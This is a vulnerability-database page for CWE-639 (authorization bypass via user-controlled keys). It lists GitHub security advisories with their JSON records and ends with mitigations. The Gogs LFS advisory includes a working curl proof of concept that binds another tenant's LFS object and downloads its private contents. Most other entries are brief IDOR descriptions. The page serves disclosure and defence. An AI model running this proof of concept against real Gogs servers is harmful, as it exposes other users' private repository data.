Common Weakness Enumeration

CWE-639

Allowed

Authorization Bypass Through User-Controlled Key

Abstraction: Base · Status: Incomplete

The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.

3234 vulnerabilities reference this CWE, most recent first.

GHSA-6P9M-Q3JP-47H4

Vulnerability from github – Published: 2026-06-23 17:10 – Updated: 2026-06-23 17:10
VLAI
Summary
Gogs: LFS dedupe path leaks private repo content across tenants
Details

Summary

Git LFS storage is content-addressed by OID alone (<LFS-root>/<oid[0]>/<oid[1]>/<oid>) but per-repo authorization lives in the lfs_object table keyed (repo_id, oid). serveUpload skips re-uploading when the OID file already exists on disk and inserts a new (repo_id, oid) row pointing at it without verifying the request body hashes to the OID being claimed. Any user with write access to one repo can bind their repo to an OID owned by a private repo and download the original bytes via their own download endpoint.

Details

Dedupe shortcut at internal/lfsx/storage.go:79-82:

if fi, err := os.Stat(fpath); err == nil {
    _, _ = io.Copy(io.Discard, rc)
    return fi.Size(), nil          // ← returns success with no hash check
}

Hash verification at internal/lfsx/storage.go:106-108 only runs in the new-file branch — the dedupe path returns earlier.

serveUpload (internal/route/lfs/basic.go:78-114) trusts that success and inserts the per-repo binding:

_, err := h.store.GetLFSObjectByOID(c.Req.Context(), repo.ID, oid)   // per-repo
if err == nil { /* already linked, drain & return 200 */ }
written, err := s.Upload(oid, c.Req.Request.Body)
err = h.store.CreateLFSObject(c.Req.Context(), repo.ID, oid, written, s.Storage())

CreateLFSObject is an unconditional INSERT on (repo_id, oid) with no check that the OID is referenced by the requesting repo's git history.

serveDownload at internal/route/lfs/basic.go:42-72 only consults the per-repo row, then streams from the shared content-addressed file.

Suggested fix

  1. In LocalStorage.Upload, when os.Stat(fpath) == nil, hash the request body via io.TeeReader and ErrOIDMismatch on disagreement — same code path as the new-file branch already uses. The "client retries after partial failure" use case still works; the retry just has to send the correct content.
  2. Optional second layer: in serveUpload, refuse CreateLFSObject unless the OID is referenced by an LFS pointer in the requesting repo's refs.

PoC

Tested against gogs at HEAD d7571322 (also reproduces on v0.14.2, paths are internal/lfsutil/storage.go and identical logic).

Reproduction prerequisites

  • Running gogs ≥ 0.12.0 with [lfs] ENABLED = true.
  • Two accounts: alice (private repo secrets) and bob (any repo bob/scratch); bob has no access to alice/secrets.
  • An OID known to be present in alice/secrets — leaked LFS pointer file in any public ancestor commit, stale fork, support ticket, or any side channel. Brute force is infeasible (256-bit).

Setup (testbed simulation of the victim's prior state)

GOGS=https://gogs.example
ALICE_AUTH='-u alice:alice_password'
BOB_AUTH='-u bob:bob_password'

VICTIM_BYTES='victim secret content'
OID=$(printf %s "$VICTIM_BYTES" | sha256sum | cut -d' ' -f1)
SIZE=$(printf %s "$VICTIM_BYTES" | wc -c)

# After this, file lives at <conf.LFS.ObjectsPath>/<OID[0]>/<OID[1]>/<OID>
# and (alice/secrets, OID) row exists in lfs_object.
printf %s "$VICTIM_BYTES" | curl -sS $ALICE_AUTH \
  -H 'Content-Type: application/octet-stream' \
  -X PUT --data-binary @- \
  "$GOGS/alice/secrets.git/info/lfs/objects/basic/$OID"

Attack — bob has only $OID, not $VICTIM_BYTES

unset VICTIM_BYTES   # attacker has no idea what the file contains

# 1. Confirm bob has no claim on $OID.
curl -sS $BOB_AUTH \
  -H 'Accept: application/vnd.git-lfs+json' \
  -H 'Content-Type: application/vnd.git-lfs+json' \
  -X POST "$GOGS/bob/scratch.git/info/lfs/objects/batch" \
  --data "{\"operation\":\"download\",\"objects\":[{\"oid\":\"$OID\",\"size\":$SIZE}]}"
# → "actions":{"error":{"code":404,"message":"Object does not exist"}}

# 2. PUT garbage to bob's LFS endpoint. The on-disk OID file already exists
#    so LocalStorage.Upload takes the dedupe shortcut: drains the body
#    without hashing, returns alice's size; CreateLFSObject inserts (bob, OID).
curl -sS $BOB_AUTH \
  -H 'Content-Type: application/octet-stream' \
  -X PUT --data-binary 'irrelevant attacker-controlled bytes' \
  "$GOGS/bob/scratch.git/info/lfs/objects/basic/$OID"
# → HTTP/1.1 200 OK

# 3. Download via bob's repo — gogs streams alice's bytes.
curl -sS $BOB_AUTH "$GOGS/bob/scratch.git/info/lfs/objects/basic/$OID" -o /tmp/leaked
cat /tmp/leaked
# → victim secret content
sha256sum /tmp/leaked | cut -d' ' -f1
# → matches $OID exactly

Independent confirmation against the source

git clone https://github.com/gogs/gogs.git && cd gogs
git checkout d7571322

sed -n '63,114p' internal/lfsx/storage.go      # dedupe at 79-82, hash check at 106 only in new-file branch
sed -n '74,117p' internal/route/lfs/basic.go   # serveUpload calls CreateLFSObject regardless of dedupe path
grep -n 'primaryKey' internal/database/lfs.go  # composite (RepoID, OID) PK — multiple repos can share an OID row

Impact

  • Cross-tenant disclosure of any LFS object on the instance. Attacker needs HTTP write to one repo + knowledge of a target OID; storage path is global, no per-repo isolation.
  • LFS commonly stores certificates/keys, firmware blobs, ML model weights, datasets containing PII, packaged installers — all extracted byte-for-byte.
  • Persistent: the (bob/scratch, OID) row pins read access until manually deleted; removing bob's repo write access does not revoke prior binds. No artefact on victim's side beyond a 200 in the LFS access log.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "gogs.io/gogs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.14.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-52812"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-345",
      "CWE-639",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-23T17:10:25Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "Summary\n\nGit LFS storage is content-addressed by OID alone (`\u003cLFS-root\u003e/\u003coid[0]\u003e/\u003coid[1]\u003e/\u003coid\u003e`) but per-repo authorization lives in the `lfs_object` table keyed `(repo_id, oid)`. `serveUpload` skips re-uploading when the OID file already exists on disk and inserts a new `(repo_id, oid)` row pointing at it **without verifying the request body hashes to the OID being claimed**. Any user with write access to one repo can bind their repo to an OID owned by a private repo and download the original bytes via their own download endpoint.\n\nDetails\n\nDedupe shortcut at `internal/lfsx/storage.go:79-82`:\n\n```go\nif fi, err := os.Stat(fpath); err == nil {\n    _, _ = io.Copy(io.Discard, rc)\n    return fi.Size(), nil          // \u2190 returns success with no hash check\n}\n```\n\nHash verification at `internal/lfsx/storage.go:106-108` only runs in the *new-file* branch \u2014 the dedupe path returns earlier.\n\n`serveUpload` (`internal/route/lfs/basic.go:78-114`) trusts that success and inserts the per-repo binding:\n\n```go\n_, err := h.store.GetLFSObjectByOID(c.Req.Context(), repo.ID, oid)   // per-repo\nif err == nil { /* already linked, drain \u0026 return 200 */ }\nwritten, err := s.Upload(oid, c.Req.Request.Body)\nerr = h.store.CreateLFSObject(c.Req.Context(), repo.ID, oid, written, s.Storage())\n```\n\n`CreateLFSObject` is an unconditional `INSERT` on `(repo_id, oid)` with no check that the OID is referenced by the requesting repo\u0027s git history.\n\n`serveDownload` at `internal/route/lfs/basic.go:42-72` only consults the per-repo row, then streams from the shared content-addressed file.\n\nSuggested fix\n\n1. In `LocalStorage.Upload`, when `os.Stat(fpath) == nil`, hash the request body via `io.TeeReader` and `ErrOIDMismatch` on disagreement \u2014 same code path as the new-file branch already uses. The \"client retries after partial failure\" use case still works; the retry just has to send the correct content.\n2. Optional second layer: in `serveUpload`, refuse `CreateLFSObject` unless the OID is referenced by an LFS pointer in the requesting repo\u0027s refs.\n\nPoC\n\nTested against gogs at HEAD `d7571322` (also reproduces on `v0.14.2`, paths are `internal/lfsutil/storage.go` and identical logic).\n\n### Reproduction prerequisites\n- Running gogs \u2265 0.12.0 with `[lfs] ENABLED = true`.\n- Two accounts: `alice` (private repo `secrets`) and `bob` (any repo `bob/scratch`); bob has no access to `alice/secrets`.\n- An OID known to be present in `alice/secrets` \u2014 leaked LFS pointer file in any public ancestor commit, stale fork, support ticket, or any side channel. Brute force is infeasible (256-bit).\n\n### Setup (testbed simulation of the victim\u0027s prior state)\n\n```sh\nGOGS=https://gogs.example\nALICE_AUTH=\u0027-u alice:alice_password\u0027\nBOB_AUTH=\u0027-u bob:bob_password\u0027\n\nVICTIM_BYTES=\u0027victim secret content\u0027\nOID=$(printf %s \"$VICTIM_BYTES\" | sha256sum | cut -d\u0027 \u0027 -f1)\nSIZE=$(printf %s \"$VICTIM_BYTES\" | wc -c)\n\n# After this, file lives at \u003cconf.LFS.ObjectsPath\u003e/\u003cOID[0]\u003e/\u003cOID[1]\u003e/\u003cOID\u003e\n# and (alice/secrets, OID) row exists in lfs_object.\nprintf %s \"$VICTIM_BYTES\" | curl -sS $ALICE_AUTH \\\n  -H \u0027Content-Type: application/octet-stream\u0027 \\\n  -X PUT --data-binary @- \\\n  \"$GOGS/alice/secrets.git/info/lfs/objects/basic/$OID\"\n```\n\n### Attack \u2014 bob has only `$OID`, not `$VICTIM_BYTES`\n\n```sh\nunset VICTIM_BYTES   # attacker has no idea what the file contains\n\n# 1. Confirm bob has no claim on $OID.\ncurl -sS $BOB_AUTH \\\n  -H \u0027Accept: application/vnd.git-lfs+json\u0027 \\\n  -H \u0027Content-Type: application/vnd.git-lfs+json\u0027 \\\n  -X POST \"$GOGS/bob/scratch.git/info/lfs/objects/batch\" \\\n  --data \"{\\\"operation\\\":\\\"download\\\",\\\"objects\\\":[{\\\"oid\\\":\\\"$OID\\\",\\\"size\\\":$SIZE}]}\"\n# \u2192 \"actions\":{\"error\":{\"code\":404,\"message\":\"Object does not exist\"}}\n\n# 2. PUT garbage to bob\u0027s LFS endpoint. The on-disk OID file already exists\n#    so LocalStorage.Upload takes the dedupe shortcut: drains the body\n#    without hashing, returns alice\u0027s size; CreateLFSObject inserts (bob, OID).\ncurl -sS $BOB_AUTH \\\n  -H \u0027Content-Type: application/octet-stream\u0027 \\\n  -X PUT --data-binary \u0027irrelevant attacker-controlled bytes\u0027 \\\n  \"$GOGS/bob/scratch.git/info/lfs/objects/basic/$OID\"\n# \u2192 HTTP/1.1 200 OK\n\n# 3. Download via bob\u0027s repo \u2014 gogs streams alice\u0027s bytes.\ncurl -sS $BOB_AUTH \"$GOGS/bob/scratch.git/info/lfs/objects/basic/$OID\" -o /tmp/leaked\ncat /tmp/leaked\n# \u2192 victim secret content\nsha256sum /tmp/leaked | cut -d\u0027 \u0027 -f1\n# \u2192 matches $OID exactly\n```\n\n### Independent confirmation against the source\n\n```sh\ngit clone https://github.com/gogs/gogs.git \u0026\u0026 cd gogs\ngit checkout d7571322\n\nsed -n \u002763,114p\u0027 internal/lfsx/storage.go      # dedupe at 79-82, hash check at 106 only in new-file branch\nsed -n \u002774,117p\u0027 internal/route/lfs/basic.go   # serveUpload calls CreateLFSObject regardless of dedupe path\ngrep -n \u0027primaryKey\u0027 internal/database/lfs.go  # composite (RepoID, OID) PK \u2014 multiple repos can share an OID row\n```\n\nImpact\n\n- **Cross-tenant disclosure of any LFS object on the instance.** Attacker needs HTTP write to one repo + knowledge of a target OID; storage path is global, no per-repo isolation.\n- LFS commonly stores certificates/keys, firmware blobs, ML model weights, datasets containing PII, packaged installers \u2014 all extracted byte-for-byte.\n- Persistent: the `(bob/scratch, OID)` row pins read access until manually deleted; removing bob\u0027s repo write access does not revoke prior binds. No artefact on victim\u0027s side beyond a 200 in the LFS access log.",
  "id": "GHSA-6p9m-q3jp-47h4",
  "modified": "2026-06-23T17:10:25Z",
  "published": "2026-06-23T17:10:25Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/security/advisories/GHSA-6p9m-q3jp-47h4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/pull/8333"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/commit/f35a767af74e05342bafc6fdda02c791816426f8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gogs/gogs"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/releases/tag/v0.14.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Gogs: LFS dedupe path leaks private repo content across tenants"
}

GHSA-6PGG-77XR-RQQP

Vulnerability from github – Published: 2026-05-14 15:31 – Updated: 2026-05-14 15:31
VLAI
Details

Authorization bypass through User-Controlled key vulnerability in Im Park Information Technology, Electronics, Press, Publishing and Advertising, Education Ltd. Co. DijiDemi allows Privilege Abuse.

This issue affects DijiDemi: from v4.5.12.1 before v4.5.13.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-6008"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-14T13:16:21Z",
    "severity": "MODERATE"
  },
  "details": "Authorization bypass through User-Controlled key vulnerability in Im Park Information Technology, Electronics, Press, Publishing and Advertising, Education Ltd. Co. DijiDemi allows Privilege Abuse.\n\nThis issue affects DijiDemi: from v4.5.12.1 before v4.5.13.0.",
  "id": "GHSA-6pgg-77xr-rqqp",
  "modified": "2026-05-14T15:31:58Z",
  "published": "2026-05-14T15:31:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6008"
    },
    {
      "type": "WEB",
      "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0239"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6PJC-995P-MH58

Vulnerability from github – Published: 2026-02-23 18:32 – Updated: 2026-02-23 18:32
VLAI
Details

An Indirect Object Reference (IDOR) in Security Center allows an authenticated remote attacker to escalate privileges via the 'owner' parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-2697"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-23T16:29:37Z",
    "severity": "MODERATE"
  },
  "details": "An Indirect Object Reference (IDOR) in Security Center allows an authenticated remote attacker to escalate privileges via the \u0027owner\u0027 parameter.",
  "id": "GHSA-6pjc-995p-mh58",
  "modified": "2026-02-23T18:32:02Z",
  "published": "2026-02-23T18:32:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2697"
    },
    {
      "type": "WEB",
      "url": "https://www.tenable.com/security/tns-2026-07"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-6PRJ-5R8W-3X38

Vulnerability from github – Published: 2022-10-18 19:00 – Updated: 2024-08-02 21:31
VLAI
Details

The DevExpress Resource Handler (ASPxHttpHandlerModule) in DevExpress ASP.NET Web Forms Build v19.2.3 does not verify the referenced objects in the /DXR.axd?r= HTTP GET parameter. This leads to an Insecure Direct Object References (IDOR) vulnerability which allows attackers to access the application source code.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-41479"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-10-18T14:15:00Z",
    "severity": "HIGH"
  },
  "details": "The DevExpress Resource Handler (ASPxHttpHandlerModule) in DevExpress ASP.NET Web Forms Build v19.2.3 does not verify the referenced objects in the /DXR.axd?r= HTTP GET parameter. This leads to an Insecure Direct Object References (IDOR) vulnerability which allows attackers to access the application source code.",
  "id": "GHSA-6prj-5r8w-3x38",
  "modified": "2024-08-02T21:31:32Z",
  "published": "2022-10-18T19:00:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41479"
    },
    {
      "type": "WEB",
      "url": "https://github.com/IthacaLabs/DevExpress/tree/main/ASP.NET_Web_Forms_Build_19.2.3"
    },
    {
      "type": "WEB",
      "url": "https://supportcenter.devexpress.com/ticket/details/t1171808/penetration-test-idor-source-code-cve-2022-41479"
    },
    {
      "type": "WEB",
      "url": "https://supportcenter.devexpress.com/ticket/details/t190349/false-positive-vulnerabilities-known-alerts-detected-by-various-security-scanners-and"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6Q79-HWRV-JC95

Vulnerability from github – Published: 2026-03-19 06:30 – Updated: 2026-04-28 21:35
VLAI
Details

Authorization Bypass Through User-Controlled Key vulnerability in Really Simple Plugins B.V. Really Simple Security Pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Really Simple Security Pro: from n/a through 9.5.4.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-27397"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-19T06:16:25Z",
    "severity": "MODERATE"
  },
  "details": "Authorization Bypass Through User-Controlled Key vulnerability in Really Simple Plugins B.V. Really Simple Security Pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Really Simple Security Pro: from n/a through 9.5.4.0.",
  "id": "GHSA-6q79-hwrv-jc95",
  "modified": "2026-04-28T21:35:57Z",
  "published": "2026-03-19T06:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27397"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/really-simple-ssl-pro/vulnerability/wordpress-really-simple-security-pro-plugin-9-5-3-1-insecure-direct-object-references-idor-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6QM2-C6M9-24VC

Vulnerability from github – Published: 2022-05-24 19:15 – Updated: 2022-05-24 19:15
VLAI
Details

Authenticated Insecure Direct Object References (IDOR) vulnerability in WordPress uListing plugin (versions <= 2.0.5).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-36874"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-09-27T16:15:00Z",
    "severity": "HIGH"
  },
  "details": "Authenticated Insecure Direct Object References (IDOR) vulnerability in WordPress uListing plugin (versions \u003c= 2.0.5).",
  "id": "GHSA-6qm2-c6m9-24vc",
  "modified": "2022-05-24T19:15:48Z",
  "published": "2022-05-24T19:15:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36874"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/ulisting/wordpress-ulisting-plugin-2-0-5-authenticated-insecure-direct-object-references-idor-vulnerability"
    },
    {
      "type": "WEB",
      "url": "https://wordpress.org/plugins/ulisting/#developers"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-6QXC-JV43-6QG3

Vulnerability from github – Published: 2023-07-04 09:30 – Updated: 2024-04-04 05:23
VLAI
Details

The Tutor LMS WordPress plugin before 2.2.1 does not implement adequate permission checks for REST API endpoints, allowing unauthenticated attackers to access information from Lessons that should not be publicly available.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-3133"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-07-04T08:15:10Z",
    "severity": "HIGH"
  },
  "details": "The Tutor LMS WordPress plugin before 2.2.1 does not implement adequate permission checks for REST API endpoints, allowing unauthenticated attackers to access information from Lessons that should not be publicly available.",
  "id": "GHSA-6qxc-jv43-6qg3",
  "modified": "2024-04-04T05:23:10Z",
  "published": "2023-07-04T09:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3133"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/tutor/tags/2.2.0/classes/RestAPI.php#L253"
    },
    {
      "type": "WEB",
      "url": "https://wordpress.org/plugins/tutor"
    },
    {
      "type": "WEB",
      "url": "https://wpscan.com/vulnerability/3b6969a7-5cbc-4e16-8f27-5dde481237f5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6RQ7-M52P-8PQG

Vulnerability from github – Published: 2025-08-21 00:30 – Updated: 2026-05-07 05:16
VLAI
Summary
xxl-job Vulnerable to Resource Injection and Authorization Bypass Through User-Controlled Key
Details

A vulnerability has been found in Xuxueli xxl-job up to 3.1.1. Affected by this vulnerability is the function getJobsByGroup of the file /src/main/java/com/xxl/job/admin/controller/JobLogController.java. Such manipulation of the argument jobGroup leads to improper control of resource identifiers. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.1.1"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "com.xuxueli:xxl-job-admin"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-9263"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639",
      "CWE-99"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T05:16:09Z",
    "nvd_published_at": "2025-08-20T23:15:30Z",
    "severity": "LOW"
  },
  "details": "A vulnerability has been found in Xuxueli xxl-job up to 3.1.1. Affected by this vulnerability is the function getJobsByGroup of the file /src/main/java/com/xxl/job/admin/controller/JobLogController.java. Such manipulation of the argument jobGroup leads to improper control of resource identifiers. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.",
  "id": "GHSA-6rq7-m52p-8pqg",
  "modified": "2026-05-07T05:16:09Z",
  "published": "2025-08-21T00:30:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9263"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xuxueli/xxl-job/issues/3772"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xuxueli/xxl-job/issues/3772#issue-3308329205"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xuxueli/xxl-job"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.320805"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.320805"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.631704"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "xxl-job Vulnerable to Resource Injection and Authorization Bypass Through User-Controlled Key"
}

GHSA-6V3V-9P87-2GG6

Vulnerability from github – Published: 2025-10-29 21:30 – Updated: 2025-10-30 15:32
VLAI
Details

Insecure Direct Object Reference (IDOR) in /tenants/{id} API endpoint in Inforcer Platform version 2.0.153 allows an authenticated user with low privileges to enumerate and access tenant information belonging to other clients via modification of the tenant ID in the request URL.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-61876"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-29T19:15:38Z",
    "severity": "MODERATE"
  },
  "details": "Insecure Direct Object Reference (IDOR) in /tenants/{id} API endpoint in Inforcer Platform version 2.0.153 allows an authenticated user with low privileges to enumerate and access tenant information belonging to other clients via modification of the tenant ID in the request URL.",
  "id": "GHSA-6v3v-9p87-2gg6",
  "modified": "2025-10-30T15:32:34Z",
  "published": "2025-10-29T21:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61876"
    },
    {
      "type": "WEB",
      "url": "https://silvatech.uk/cve-2025-61876-inforcer-platform"
    },
    {
      "type": "WEB",
      "url": "https://www.inforcer.com/platform"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6V4W-CQRG-XV3G

Vulnerability from github – Published: 2022-05-13 01:23 – Updated: 2022-05-13 01:23
VLAI
Details

An issue was discovered in GitLab Community and Enterprise Edition before 11.6.10, 11.7.x before 11.7.6, and 11.8.x before 11.8.1. It has Incorrect Access Control (issue 2 of 5).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-9219"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-04-17T17:29:00Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in GitLab Community and Enterprise Edition before 11.6.10, 11.7.x before 11.7.6, and 11.8.x before 11.8.1. It has Incorrect Access Control (issue 2 of 5).",
  "id": "GHSA-6v4w-cqrg-xv3g",
  "modified": "2022-05-13T01:23:03Z",
  "published": "2022-05-13T01:23:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-9219"
    },
    {
      "type": "WEB",
      "url": "https://about.gitlab.com/2019/03/04/security-release-gitlab-11-dot-8-dot-1-released"
    },
    {
      "type": "WEB",
      "url": "https://about.gitlab.com/blog/categories/releases"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab-ce/issues/54159"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested.

Mitigation
Architecture and Design Implementation

Make sure that the key that is used in the lookup of a specific user's record is not controllable externally by the user or that any tampering can be detected.

Mitigation
Architecture and Design

Use encryption in order to make it more difficult to guess other legitimate values of the key or associate a digital signature with the key so that the server can verify that there has been no tampering.

No CAPEC attack patterns related to this CWE.